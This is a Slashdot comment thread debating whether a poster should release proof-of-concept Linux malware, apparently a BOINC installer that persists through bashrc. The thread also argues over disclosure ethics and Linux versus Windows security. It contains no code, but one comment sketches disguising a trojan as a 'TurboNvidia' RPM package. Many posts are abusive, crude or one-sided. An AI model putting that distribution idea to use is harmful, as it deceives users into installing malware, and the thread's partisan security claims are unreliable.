For desktops it's a little bit more complicated... but using a home partition mounted with noexec should suffice. Installing a new software is not a casual issue but a real event and should be taken care of by someone knowing what he's doing. That's why root was invented, isn't it ?
What? Have things now become so gentrified that this question even needs to be asked?
Release it already.
The 90's were great because there were active threats from all sides, spurring people to meet the challenge with actual defenses against the mayhem. By comparison now things are much more secure, but they are also incredibly less exciting, and markedly less progressive. If developers/coders are driven by a need to scratch an "itch" then by all means let's make things itchy again.
The software is non-malicious you say? Great! If nothing else it'll serve as some things for people to think about as they continue to develop their environments, and at the very least it sounds like you may have identified some genuinely soft spots in the current generation of Linux distributions. You would be far from the first person to post non-malicious proof-of-concept code to say, Bugtraq. This is not new ground--no one is going to claim you did something wrong by publishing.
Release it already!
Either we're tough enough to handle it, or we'll get tough enough to handle it.
Your idea have both merit and originality. Unfortunately the bits that have merit are unoriginal, and the bits that have originality have no merit. Good luck attempting to get n00b Ubuntu ('cause Debian is tooo hard) users to install your "malware" - given that so many of them think cli is some sort of "G" spot. Is your exploit driven by the availability heuristic?? Leaving aside the chances of your exploits "wising up" the world (get down off the cross, we need the wood) I am reminded of the saying that the "empty mactchbox makes the most noise". Google gives "Results 1 - 10 of about 1,780 for "I was fed up with the general consensus that Linux is oh-so-secure and has no malware." del./r>null PS. If you find you can't unlock your C:, try "" as a password (without the quotes)
I don't hear linux zealots talk about security through obscurity.
It is the windows zealots who state that as a justification on why windows is so virus and malware prone.
... if their product can be used as a gateway for malware to enter the system running it. They should at least write a "How to install/run BOINC without being screwed", if not extend of connection protocol to force a "BOINC tasks distribution server" to authenticate in a special mode (while deprecating the prev protocol allowing a poser to trick the user into downloading "jobs" from them).
Questions raise, answers kill. Raise questions to stay alive.
I doubt it.
Tech savvy != intelligent
I run: Windows, OS X, Linux, FreeBSD. Just because you have a hammer, doesn't mean everything is a nail.
It amuses me how many of these posts are obviously written by people who have never run Linux or have no understanding of the differences between windows (30 year old hack job of unmanaged code), and Linux. So I dare everyone to read this. If you really believe that Linux is just as insecure as window, read this entire article (front to back), then go apologize to everyone in your life you have misinformed over the last X number of years.
http://www.theregister.co.uk/2004/10/22/security_report_windows_vs_linux/
My linux systems get a lot of attacks every day. SSH, FTP and HTTP attacks are the most common.
On HTTP attacks most ones try to get a page /phpmyadmin or some other (most of the time php-) application which seem to have severe security issues. There are many insecure web applications out there that are not patched or pretty much broken by design.
I bet the security hole you're exploiting is already used in the wild. If that's so, who cares if another kid takes your code and turns it into real malware?
I personally believe it's more benefit to release your code as "penetration test" and help some admins to check their servers of potential security holes than to do nothing in fear of a few kids.
So this idiot thinks his "virus" or whatever will make a differenece in the world
Releasing it to the public will tarnish your reputation (If you have one,) Not to mention the parasites that will try to adapt it and use it to exploit people.
You are an idiot. Please create software that people will benefit from and enjoy using instead of garbage.
Release it privately to some of the "good guys" so they can fix it?
Can Linux be modified to prevent such malware from being run on any given machine? If so, why would you not want to help close such a glaring hole in the OS, while maintaining the least amount of disruption?
I see malware as something that needs fixing. You seriously do not?
To be honest, I don't really see why you are asking /.
You should be taking this straight to the folks that work on this stuff...uh...erm...Hrmm. /exit stage, left
If you created this code in hopes of making things better, first of all, talk to developers, if you have good ideas about how to eliminate such possible threats, or write articles and talk to regular people about good computer practice and computer security thus educating them. Those who do understand computer security, already know it is possible to hack any system and they do not need any kind of demonstration. It has always been possible to hack a system, whether it is windows, mac or linux, ...just wait for a bug and thats it you will have your chance of hacking.
And to release it, just to show some regular people that it is possible to hack stuff in linux too is useless, pointless and even harmful in longterm. Regular people do not understand, do not want to understand and will never understand computer security.
So if you wan't to make thing worse, go, release the code and start to screw up the linux system.
Some things are genuinely ambiguous, and "should I release a sample virus which helps security researchers and malware authors at the same time" is, IMO, pretty ambiguous. The optimal solution would be to find a way just to release it to some security people and then put it out after a few weeks.
If someone wants your network, they will take it regardless of how much security is implemented. It's that simple.
so you can write malware for linux - no big deal - connecting to IRC and waiting for instructions like DDOS'ing some server and sending mails, shure that's possible. The reason why linux is so secure is not that malware was magically "impossible" (which would contradict Rice's Theorem btw)
if you have access to a machine, then OF COURSE you can install malicious binaries, only an idiot would claim the opposite! GETTING that access is the problem! and default-users don't have access to system directories, so they can only infect their own account (plus: since binaries by default don't get the execute-bit, it's quite hard to make someone execute your binary by accident e.g. by making it look like a word-document or a video or something... you have to get him to chmod +x your binary, and THAT is no accident anymore)
The MAFIAA is a bunch of mindless jerks who will be the first up against the wall when the revolution comes
On the one hand, the way it persists itself in autostart is really nasty, and that is not really a security hole that can be fixed.
This is pretty silly. Slow news day?
^..^
Mail it to Linus, Alan Cox and the maintainers of subsystems which it abuses. Include clear notes of how it works, and what can be done to protect the systems. If you can't trust these people with it, then you should not trust Linux with your data at all. Even better, since you understand the tricks it uses, if you can write some patches, and submit them, together with your proof of exploit.
On a personal note - I also want to say thank you for doing this work. I use Linux both on servers, and as my normal desktop, and I'm immensely pleased that people are looking at making it safer: thank you.
Intelligence is task specific. You can have brilliant scientists be reduced to bumbling idiots the instant they sit down in front of a computer. Of course it's not a matter of brainpower but a matter of knowledge but they don't have that crucial knowledge and thus make mistakes that, to the average computer geek, look like pure idiocy.
Asking random smart people about the ethical implications of a highly technical issues is not going to give as many insightful answers as asking random technical people does.
USE HOT GRITS WITH STATUE OF NATALIE PORTMAN (NAKED AND PETRIFIED)
That seems like an oxymoron to me.
His worm had a little bug in it and see what happened to him :)
"what a sl*t she is" or what a complete F***ING a-hole you are?
This person, with the exploit, should write a paper, submit it to a conference and explain what he did. Don't have to release anything into the wild. Be the good guy and preach good security practices - and where there are holes to be filled.
Just release it already.
If it actually causes enough trouble to be noticed there'll be a fix for it quick smart, otherwise it won't matter.
"a Linux system can be turned into a botnet client by simply downloading BOINC and attaching it to a user account to help scientific projects"
Can you provide a link to a demonstration of this Linux 'malware'. One that - with no user action - can compromise my machine or by clicking on even a version of 'malware' that works by clicking on a URL or opening an email attachment.
As far as I can make out, users must first download and install BOINC and allow RPC calls. I mean if that's your definition of malware so is me putting a safe in the middle of the street with the combination numbers taped to it. No doubt you would then write a story about just how easy it is to crack that particualr model of safe.
kdawson, have you nothing else to write about ???
Windows 7 is HUGE step back when compared to Windows Vista. The UAC is so limited that it does not give any kind real protection what the Vista's version did. On Windows 7 any normal account user can add new users and even give them a admin stated rights without UAC even giving warning. That is the default setting and does not help protect computer. Then the Windows 7 UAC was tested against 10 newest mallware and almost all went totally trought from it, without giving anykind UAC question.
The marketshare has nothing to do with the security. The code is the only thing what rules is the software secure or not. Secure software can be shared to all humans in the world and no one could actually crack it. But you need to share unsecure software for few users and they would get cracked if those softwares are being used in situation where there is good profit. If you have a software what is in use on all US banks, it is much higer risk to get traced because there are other security measurements. But if you have same software in all PC's in the US. It is much harder to get traced back to you, but profiting is much smaller, just like the risk. It is always easier to attack for unsecure persons than other well protected persons.
I'm not pro-war, but I sure as hell will be happy that war allowed us to developed the nuclear bomb when aliens invade. So I say release it - knowledge is impossible to contain - we are better off adapting to it early.
So the fact that Apple computers are consistently the first to be hacked in pwn2own contests, have completely passed you by?
This is what you REALLY want to hear, right?
You wrote some crappy malware (seriously, not that hard to do), managed to autostart it with bashrc (seriously, you call that "nasty"? every first semester student should be able to do it) and then you boast about it on the internet. I very much doubt that the morality of the matter is really a concern. You just want others to know that you are a cool hacker that could hack Linux. Newsflash: Nothing special.
Release it or not, it really doesn't matter. There are a million other scripts like that out there already and yours is most probably in no way special.
Of course, why actually sleep with her when you can just brag about her offer on slashdot!
Why not do both?
What is it that makes malware, well, malware?
It's software on your system which you don't want there, didn't ask for, and can't easily get rid of without a significant investment in time and/or knowledge.
Seems like it fits the definition to me. In Windows, malware usually infests the system (registry, files, processes, etc.), and sometimes it's not all that clandestine about it. This would not be so dissimilar from unwanted software which only remains resident in the user $HOME: due to uniform package manage management and vastly improved upon install scripts/configuration, a reinstall is relatively straight forward (dump package names, reinstall, install packages) and takes a reasonably short period of time (less than a Windows install on its own, for instance). Instead, the offending executable would have to be dug out of $HOME manually (or found with a tool) - either way, it's an agitation and non-trivial if you're unsure of what you're looking for.
Now, is this malware example particularly trivial and not all that attention grabbing? Yes. How did this make FP?
~/ssh slashdot.org ssh: connect to host slashdot.org port 22: too many beers
As long as you release it properly you should do it.
Don't kid yourself. It's the size of the regexp AND how you use it that counts.
My first thought was that the OP is a Microsoft shill.
Microsoft would feel very smug if Linux could be shown to be as vulnerable to malware as is Windows.
Well? Are you?
Don't waste your time with jedidiah. He is a known anti-ms troll & F/OSS cheerleader.
Look, unless it was purchased in the last month or so (and I may be too liberal with the timeline since OEM machines can sit on a shelf for months), I don't dare set up a Windows XP machine and connect it directly to the Internet to update the operating system because it will be pwned in about 30 seconds. Part of the problem is Microsoft's dependence on updates over the Internet to fix known vulnerabilities. I know, I know, there are ways around it, but how many apply to the owner of a Dell machine with a recovery disk? No stupid luser involved, no need to download anything, just connect it to the friggin' Internet to update the patches!
I can (and have) download(ed) the latest image of any of the popular *nix's, do an install and be reasonably certain that the unit will not be pwned when I connect it directly to the Internet.
Now tell me again how *nix's are as insecure as Windows...
"If executed by the user"
We're done here. Next time try a remote exploit requiring no user action. They do exist.
There isn't something all white you could be doing instead? Priorities man! Priorities.
-- Programming with boost is like building a house with lego. It's a cool but I wouldn't want to live in it
So one of my users accidentally runs your trojan. No problem. I write a script that cleans it up on every machine in my network without interfering with the users at all. It takes me about 5 minutes.
On MS-Windows, I have to go around to every machine on the network to clean it up. There have been times I've had to re-ghost a machine because it was so infected.
I'm not sure what this whole apple-to-oranges gedanken is all about. It surely doesn't explain how MS-Windows is just as secure as Linux.
Microsoft is to software what Budweiser is to beer.
Since the mal in mal-ware stands for malicious, it is logically impossible to release non-malicious malware.
This is another example of typical programmer thinking.
I see a security hole, I'll EXPLOIT it with some "harmless" malware, and teach people a lesson.
-Are you 100% sure your "harmless" malware will not bring down a critical system?
-Can you sleep at night knowing you broke several laws?
-How about if people choose to go after you for damages?
I know you are just a simple programmer, and have no professional body we can complain or report you to, besides your employer, but you can still be held PERSONALLY liable for damages.
A real engineer would NEVER EVER think of doing this. "software engineers" on the other hand, have time to think of doing crap like this, because they have no real consequences besides being personally held liable, if they are ever caught.
Go hide behind your anonymity. Give programmers a black eye from which they may never recover.
"software engineers" my a55.
I have a freind who is a chuckle-headed moron. He used to be a drug addict. And now, when he talks about the drugs, he actually describes, in detail, how he abused them so that anyone who hears him will know how to do it and thus become an adict even quicker. And I tell him not to and he goes on with the description because he has a perverse side of his personality. Publishing how to hack and do root kits to 'the world' is much the same. People who do this are looking for approval and/or money.
No
Nope
Uh-uh
Nut
Naw
Nah
No way
Na
Nese
Nein
Naaga
Bu shi zhe yang
Nanga
Ndaga'
Nei
Nyet
I think you get the idea.
The pwn2own contest isn't a bunch of people hacking different OS's simultaneously: They draw names from a hat to see who goes first. People aren't hacking from scratch at the contest either: most show up with exploits for multiple OS's that they already know to be working.
Since you get to keep the hardware if you're the first to hack it, OF COURSE EVERYONE CHOOSES TO USE THEIR MAC EXPLOIT FIRST. Vulnerability never even enters into the equation; it's hacked first because people want to win the most expensive and best hardware. Windows immediately falls when the next contestant steps up and can no longer win the Mac hardware.
Of course... Linux did make it all the way through the pwn2own contest in the past.... but it's impossible to say if that's due to lack of interest or the fact that the browser installed on the machine was one the contestants were unfamiliar with and therefore did not have working exploits.
Oh yeah... from reading about it, it seems that pwn2own tests browser security, not the OS - and it doesn't take into account whether the hack lets you execute user level code (the Mac exploits) or run as the kernel (many Windows flaws). So, I don't really see it as being of any real use as an OS security benchmark.
I really don't understand what the OP is trying to prove. That running a program as a regular user on will allow that program to have that users priviledges??? Is this meant to be some sort of revelation?
Note to self, purposely installing malware is not a good idea.
OP: I'm affraid you have wasted alot of time and proved nothing with this experiment.
Isn't the word "malware" formed from the words "malicious" and "software"?
How can there be such a thing as non-malicious malware when malware is a portmanteau of "malicious software"?
No one cares what your captcha was
Houston TX, USA
What is all this talk about Attack Vector... All these mysterious ways of getting a linux machine infected.
Just put some malware rpm on some random chinese/russion/etc server and call it the TurboNvidia.RPM and all a user has to do is click on the damn thing in firefox and install it. They have to click yes to override the signature but I've seen Ubuntu users do much worse.
Yes, release it! Security through obscurity isn't. This is needed.
Over-the-top Response Guy! Giving "Over-the-Top Responses" since 1970.
That's like one guy who said "My best friends' girlfriend wants to sleep with me - should I do it so I can show him what a sl*t she is?"
Yes, she's already sleeping with more than one of your best friends, so go for it!
a lot of us have been in the position of being able to do a lot worse, or been offered $$$ to do a lot worse
As a Linux user who works as a software engineer, I'd be interested to learn about the vulnerabilities that the exploit uses to take control of a Linux system. I have no formal security background, but understand how to use cron and Makefiles for non-nefarious purposes... so a short paper about these attack vectors would be quite educational. I like knowing how to protect myself and knowing how to explain to other people what is right/wrong so they can protect themselves. Not publishing known risks (especially if they're PEBCAK risks) is security through obscurity and I think Linux is a strong enough platform that it shouldn't be relying on this type of security.
Linux being made insecure by stupid users. What a shock. Do you really think your code will do anything previous code as not done? truly? Release it already. My systems won't be affected, nor will the majority of Linux users. I say let the noobs get infected by lame code, they will learn from it.
Ha, Firefox and Explorer stopped responding the first time I opened this thread, so I'm getting a kick, etc.
Anyway, thanks for reminding me that I need to invest in a bunch of RAM for my home server so I can move most of the services into VMs :P
Write a 100-page technical description.
If someone reads it to exploit it.. .. they probably would even without your help.
I could knit-pick your grammar, but is this overall claim based in empirical research? Linux certainly has it's flaws and while it's not susceptible to WINDOWS malware, it certainly is to a variety of others. Perhaps take a look at http://insecure.org/ or http://www.packetstormsecurity.org/. Both of these sites maintain lists of exploits to various version of Linux and many other types of GNU software as well. Rootkits most generally fall into the realm of 'malware' and once you've got root, baby, you've got the world.
I'd go so far as to say that I highly doubt that sufficient numbers of people would be adversely affected by it to warrant any sort of legal action against you... at most you might be providing a proof of concept for security experts who can then proceed to adapt to what changes may be necessary to avoid the attack vector in the future.
Release it, and move on.
File under 'M' for 'Manic ranting'
"Who's" is a contraction of "who is". It should read "There's one thing stronger than all the armies in the world and that is an idea whose time has come. - Victor Hugo"
Free Martian Whores!
It has the bi- prefix.
Just as a lot of other interesting stuff, all starting with "bi-".
"Sufficiently advanced satire is indistinguishable from reality." - [Tips: 1DrYakQDKCQ6y52z6QbnkxHXAocMZJE61o ]
Arrange for it to steal two cents from each person who installs it, then every month or so deposit half of what it's collected to Torvalds' bank account, and send the other half of the month's take to one lucky infected user.
People will be begging for the thing.
PS, who wrote the AI behind the Captcha system? It's really good. The word for this post is:
"Pyramid"
lets all justn have seccxx
if Linux starts getting as bad as Windows, I will personally hunt you down and beat you to death with Richard Stallman
"I disapprove of what you say, but I will defend to the death your right to say it." - Evelyn Beatrice Hall, re Voltaire
Um, and this is different from a Windows virus how? {...} It's not because your system is any more secure against "CLICK HERE TO WIN FREE XBOX 360" infections.
Windows XP way :
Linux way :
In short there are 2 main differences between the windows and unices environment :
There's another big difference, specific to opensource environment like Linux and BSD (and not other unices):
(Although the above only regards malwares exploiting *bugs*, not payload which are simple regular softwares).
With Vista and Seven, Microsoft has attempted to fix some of these problems. Nonetheless, the fix is still a lot noisy ("Cancel or Allow ?") to the point that some user simply start to blindly "Yes-click-through" and the protecting effect is lost. And users are still trained to install crap by downloading it from random websites.
With Linux, these advantages become a handicap regarding commercial softwares : They have to target multiple combination of softwares in distributions (unlike open-source software where the package are vetted by the distribution maintainers themselves thanks to the source being available for that puprose). And these software are not just a package in a regular repository, making them inaccessible using the regular method.
There is indeed no software which is 100% guaranteed secure.
But ! There's still a difference like between putting a real fence around your house and having a dog on one side, and just stick a paper with "don't rob us" written on it on the other side.
And, no matter what, some users will always find a way to shoot themselves in foot.
But on Unix, the gun is locked behind a glass door and must have a security pin removed before being able to shoot the foot, whereas on Windows an armed ready-shoot-gun is just a normal wall decoration.
The only "protection" that *nix/mac systems have over Windows is that no one gives a rats ass about infecting you
Ok, could we please stop with this troll now ?
At one side of the range, Linux has ratter good market shares in the servers and scientific clusters domains.
At the other side of the range, Linux has achieved quasi-monopoly in the embed domain, specially on home routers, wireless access points, small NAS/SAN, no-brand multimedia play
"Sufficiently advanced satire is indistinguishable from reality." - [Tips: 1DrYakQDKCQ6y52z6QbnkxHXAocMZJE61o ]
So you want to do away with Ask Slashdot? It's a moral dilemma, he's got the potential to do great good but it just as easily might enable those who would use it for evil. Asking peers for opinions or insight doesn't mean he wants to blame others. There might be things he hasn't though of, or a better way to accomplish things. It's just a smart thing to do.
"Dr. is this the correct incision point, or will cutting here kill the patient?"
"If you have to ask, your ethical compass is b0rked. Dumb@ss n00b!"
Can we mod parent up?
The real reason Linux is malware-free can be summed up in a simple analogy: "You don't let your dog shit in your own front yard." It's no question the preferred box for hackers is a *nix box. Why sully their own yard when there are so many Windows and Mac homes out there with yards perfectly ripe for a fresh Cleavland Steamer?
Like parent says, it's stupid to think of Linux as uncrackable. If there's a port into the system then there's a potential exploit; it doesn't matter what the box is running. It's far more likely that malware hackers just like to have a clean lawn. Leave that shit for some other guy to clean up.
You are obviously thinking more about this than I ever did. Don't worry about it. This sort of stuff has existed since before Thompson wrote a backdoor into the c compiler.
I wrote some similar stuff some years ago, as an exercise. I didn't release anything because I figured everything I did was obvious or trivial. Anyone that wanted to use something like this could have written it themselves.
I didn't think of the Wine angle, that's neat. Of course, I've never used Wine, so perhaps I'm excused. ;-)
Please don't associate BOINC with you little project. It will confuse the casual reader into thinking it is something bad rather than something good.
"Education is not the filling of a pail, but the lighting of a fire." -- William Butler Yeats
Why should this be any different from what research scientists do all the time (with actual security holes to boot)? Just write up a research paper (or a blog post or whatever) and describe the problem and give some thoughts to possible solutions (user not being mindless idiots anymore) and release it. There is definitely nothing ethically wrong with it in my book (and there shouldn't be in anyone else's either).
Please stick to Jaunty for now. DO NOT try to install Karmic yourself.
"When information is power, privacy is freedom" - Jah-Wren Ryel
I'm sorry, but running userland "daemons" is child's play. This has been around for EONs. Please don't think you have something new here.
You problem here is that, you idea will only affect the *USER* environment, not the machine. Anything you run or install into the user environment will be bound by the standard user accounts everyone should be running as, without privileges (such as root/super user)
This separate the privileges from the user and the system quite well and delineates it.
Lets compare Windows and *NIX (in general):
Windows, I can send you and e-mail and you standard user just looks at my e-mail and via ActiveX can leverage a 10 year old exploit to install a service as a *SYSTEM ACCOUNT*. This means my process then has full access to the system... Possibly being able to wipe out the machine period, or use it for a launching pad to send out e-mails to other accounts on the system or other account in any address book or just grab your passwords (probably being abcd1234 or password or or what have you (Think Sarah Palin's Yahoo account... wooo really good password there)) for your Bank account. Its very much *THAT* simple, no stupidity involved.
Now, if for some reason ActiveX is disabled, I can just tell you how important the Microsoft update is and it needs to be run... and how you *MUST* forward it to your friends so they can be safe... Sheeple are gullible and will never be safe from this stupidity.
Now speaking of stupidity, its really the only way Linux/*NIX/*BSDs will be compromised... even then most likely only the *user's* data will be flogged. Not the whole system. Now, let us just say *I* download and run your program/update/shell/python script/perl script/etc... Sure it downloads and installs the BOINC daemon and runs in the background... to be honest who cares. Any program you run or have running to capture data from the user will only affect the *USER* not the whole system. Separation of privileges is pure and simple why the *NIX systems will not seriously fall prey to these kinds of things. And to be honest, unless you install a persistent AT job for the BOINC daemon to start or at the very least a cronjob that runs every minute... a reboot will kill your pitiful attempt.
greg, REMEMBER ED CURRY!!!
A father used to rationalize why he was so mean to his son by saying, "I'm getting him ready for the world, because it is mean." By that rationale, the best thing would be to simply dump the child out on the streets.
If you see flawed code, submit a patch.
If you see flawed usage, educate users (documentation, blog article, forum posts).
And you have nothing better to do then break things and show other how to make a mess.
My son's system got hacked that way [backwards "..."] "Here download this program, run it, ignore any warnings, choose 'allow' for every UAC prompt, and then it will give me remote control of your system so I can 'fix' it for you." [...] I was busy in the other room [...] Teenagers, seesh, looking for the quick fix, but adults are just as dumb and fall for the same thing as there are so many helpful strangers on the Internet
The problem, as I see it (and it's only a guess, but hear me out), is one of conditioning.
Windows (I've used 95, 98, XP) tends to warn about pretty harmless stuff. "Are you sure? Only click yes if you want me to do what you just asked me to." Or "Warning: [weird undecipherable sentence about cryptography that will take those who know about crypto a good 15 minutes of research to answer the right way with a modest success rate]. Yes or no?" And clicking "Yes" always works. "Warning: running this program might have side effects (as opposed to just spending its cycles making your CPU hotter). Run it?"
A lot of repeated trials of this ought to condition users to take warnings with a grain (well, bucket) of salt. Add on top of this all the experiences where they copy-paste the error message into google, find a forum post which fixes their problem, or ask someone on IRC and they provide the solution, and people will learn to trust strangers on the internet (because said trust is most often warranted).
Ask yourself how you solve technical problems with your boxes. Do you research everything yourself? Or do you use google/IRC/...?
I don't know exactly how the situation looked through the eyes of said teenagers. Did it really explicitly say "let me take control of your computer"? By your own statement, you were away when it happened. Did you go back and look afterwards?
Most of the things you find on the net is the good stuff. Windows conditions users into not taking warnings as a serious sign of (potential) danger. Is doing what your environment tells you is the right thing called "looking for the quick fix" these days?
Wrong. The Macs are hacked first because they come with QuickTime Player, which is a bug-ridden piece of shit that Apple refuses to maintain properly.
If you have quicktime on your box, someone out there can own you, simple as that.
then show this code to whomever it will help actually fix those holes but try not to release it to the public at large
I'm sorry to bring up an argument that everyone has already heard (or work out on their own), but I think it warrants a saying (yet again):
How about also releasing information about workarounds to the countless systems administrators who are in a position to deploy that workaround? (Good luck on doing that while not releasing information to the general public)
I'd bet half of the people who mock windows users for downloading and installing untrusted software would download this, type in their root password, and let it install.
Why wouldn't they compile it with --prefix=~/local/ instead? That way, you know where you install all your shi^Wsoftware...
I would certainly say so. I would say that the moral behavior "emerges" from the crowd, the same way your consciousness "emerges" from the neurons in your brain, even though no individual neuron is conscious. Democracy is premised on a similar idea.
I don't think it matters what I write here... you will release it.
Doesn't that just make it 'ware'?
so I wrote some code and spread the s**t from the windows world to the other worlds just to point out that I in fact hate lunix people for being cool.
In too many cases, the questions are along the lines of "I don't feel like doing my homework" or stuff like that. Or questions that could have been answered with the first search result from the text of the question itself. Or they're really slashvertisements. That's why many of these go off-topic; once 20 people have posted "justfuckinggoogleforit", ther's not much more on-topic.
In this case, the poster was either looking for absolution or wanted to brag a bit.
Now, as to doing away with "Ask Slashdot" - why not Ask Slashdot?
Personally, I have no problem with it, but then again, I have no problem with idle.slashdot.org either, so you can be excused for thinking I might be slightly brain-damaged.
If you're referring to the article from a couple of weeks ago (by the "the Windows 7 UAC was tested against 10 newest mallware and almost all went totally trought from it, without giving anykind UAC question" line), none of the 'mallware' in question that passed through required administrator privileges for anything in the first place, and UAC wouldn't have triggered for it under Vista or the highest settings in 7.
Do you even know what UAC is for?
If you have to ask the community if it's ethically appropriate for you to release this code probably means that you shouldn't.
The fact that you don't know for yourself and you have to ask the community tells me that you probably shouldn't have the skillset you do, for you could potentially use your knowledge for nefarious purposes.
Contact the security arm of all major distributions as well as senior Linux devs. Be willing to submit the code to those specified vendors so they can start to take action. Then write it up but do not release any code (work with the vendors to identify when appropriate advisories will be released).
Someone else will take your work (paper) and develop something evil, so giving vendors time to respond prior to release is important.
Even your posting on slashdot will now have evil doings scrambling to figure out what you did for their own purposes.
Great work! This has a potential to steup up the security stance of the standard Linux systems as released by vendors.
Good luck.
Release it. It's not malware in the way that windows malware gets spread. My Linux and FreeBSD boxes ARE more secure than your windows boxes. /.
If it can't be installed without user interaction, it's useless here on
Me thinks it's a hoax and flamebait.
I say things which affects my Karma negatively. (and I don't care) For instance; All religion is false.
Good and evil.
Both fine choices, whatever floats your boat.
If you've got a good package, present it to the NSA. They'll DEFINITELY want to hear about it. Possibly a consultancy.
So what does it mean when there's a contest about hacking into Mac, Windows, & Linux... and Mac gets taken out first? http://www.pcpro.co.uk/news/249768/safari-falls-in-10-seconds-at-hacking-contest No marketshare to worry about in that contest, just PWN 2 OWN.
The problem with all weapons, is idiots like you who were bored and had no other avenue of displaying their talents. Give you kudos for comming out and talking about it, but seriously, get a life.
Send it over to Secunia and CERT. They know who it needs to get to, and know how to release it properly. And, to boot, you get the credit for it.
It's a fucking no-brainer here. And if you are really a _________hat, you would have already known to do this. I think you don't have any code, just a possible attack vector. Either way, send it over to them, they release it after coming up with code (If your's is broken) after a week or two after notifying the vendor. And you get credit for discovering it.
You'll only get sued if you do it the wrong way: ie attaching your name to it and releasing it to the wild.
... still work and their friends with windows, well, don't.
So go ahead, release the code, I'm not worried. He might even infect 100 machines! Woop de do. If I put the same effort into a windows virus, I could probably own millions in just a matter of days. I don't need a proof of concept, there are plenty of real world examples. Most machines STILL run as admin in the windows world.
Sigh, that would have been an excellent plot: using Linux malware to take over the world.
The BOINC license agreement states that you will only install BOINC on machines for which you have the premission of the owner of the machine.
i run Debian GNU/Linux with stumpwm and sawfish as main "desktops". there is no sudo on my box and just one sources.list entry of an official secondary mirror in my hometown (i know the admin personally). i download just from the main repository (vrms gives null results i.e. i get just trusted high quality software). i got iptables, ebtables, rkhunter, tiger , chkrootkit, unhide, ossec-rootcheck, tripwire, custom hosts file, hosts.allow, all unnessecary tty's disabled, just one port open for lsh (which only allows gpg authenticated connections into a underprivileged dummy account), my main browser is w3m via surfraw, got my own dns server, web proxy, the only udp port open is the one for dhcp and my router got it's own firewall, bla bla bla bla bla... you think you can put something in my bashrc? o.k. try it. if you succeed i send you back a nice present! but don't cry when your windoof box breaks you little wannabe script kiddy! i guess you couldn't even crack the bashrc on my HURD system if i gave you an account on it...^_^
Well your mod just went away when you replied to that comment. Thanks. ;)
SIG FAULT: Post index out of bounds.
If you're so afraid, release it, but don't open-source it. Though since you have made this already anyway, people are going to make their own malware eventually.
I am not devoid of humor.
Just send it to me. I'll keep it safe.
A lot of popular closed-source apps like Skype and Flash are available as .deb packages, and if someone is used to downloading .exe and .msi files from random places it's no big leap to do the same with a .deb.
And this is really bad, because it breaks the whole "use one single - or a reduced number - of trusted sources" security principle behind Linux distribution.
Thankfully, some of these software come with a license which allow them to be repackaged by distributors (often the case with Flash).
Sometime, the distributor try to mitigate the problem by providing a 'fetcher' package - which doesn't repack the proprietary software but attempts to retrieve a known-good version from a known-good source (Microsoft's Core-Font are often programmatically downloaded that way). But none the less this makes the user more relying on external sources.
Nonetheless, proprietary close-source applications like Skype pose security threats by themselves, lacking the amount of eyeballs as stated in ESR's "Linus law".
"Sufficiently advanced satire is indistinguishable from reality." - [Tips: 1DrYakQDKCQ6y52z6QbnkxHXAocMZJE61o ]
GO TO HELL!!!! If you release this malware, you will soon see truly malicious viruses for linux. Linux is more secure than windows, but not as much as some users like to think. If you release this or already did, may you be Bill's towel boy in hellfor eternity, and may Steve Ballmer shove a Pineapple up your @$$.
How are Windows Vista and Windows 7 better than XP, in screening out the malware? How is MacIntosh better? I will buy a new computer soon. I really need to know!
Perhaps you could refactor it as an analysis tool? It could still be malware-ish, inserting itself into cron and wherever, but regularly checking for the original openings, and suggesting ways to close the gaps.
Someone just vomited on my monitor??!?
Oh, no, it's just the Karmic colour scheme! ;)
If it is the same Johannes Buchner that I found through Google, then he lives in Austria, so that specific law doesn't apply to him.
You make a good point that US law shouldn't necessarily be his first worry, but even if his own country doesn't have a similar law against making malware, then there's always the possibility of extradition.
(See the case of Gary McKinnon for one example of a UK citizen that we're working to extradite for hacking charges, and the case of Sholam Weiss (on fraud and money laundering charges) for proof that we do have an extradition treaty with Austria.)
If it's for-profit but free, you're not the customer -- you're the product (e.g., the Slashdot Beta's "audience").